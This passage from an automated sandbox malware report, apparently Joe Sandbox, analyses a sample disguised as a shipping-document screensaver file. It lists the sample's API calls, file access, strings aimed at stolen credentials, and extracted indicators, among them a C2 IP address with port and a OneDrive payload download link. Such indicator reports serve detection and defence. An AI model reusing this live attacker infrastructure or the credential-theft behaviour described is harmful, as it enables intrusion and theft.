Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	32_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	32_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	34_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	34_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	34_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	34_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	34_2_00007FF70CC97B4C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040AE51 FindFirstFileW,FindNextFileW,	36_2_0040AE51
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	37_2_00407EF8

Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw
Source: Malware configuration extractor	URLs: 104.250.180.178

Uses ping.exe to check the status of other devices and networks

Source: C:\Users\Public\alpha.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_028BD028 InternetCheckConnectionA,

0_2_028BD028

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 104.250.180.178:7902

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View	IP Address: 104.250.180.178 104.250.180.178
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,

0_2_2795B380

Source: global traffic	HTTP traffic detected: GET /download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhv5415.tmp.36.dr	String found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv5415.tmp.36.dr	String found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864575924.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864575924.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: onedrive.live.com
Source: global traffic	DNS traffic detected: DNS query: c6c4bq.db.files.1drv.com
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868530475.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp, bhv5415.tmp.36.dr	String found in binary or memory: http://geoplugin.net/json.gp
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1868530475.000000002756F000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1936062124.000000002756F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp&c2?
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpV
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp_
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000986000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpj
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.digicert.com0Q
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocsp.msocsp.com0S
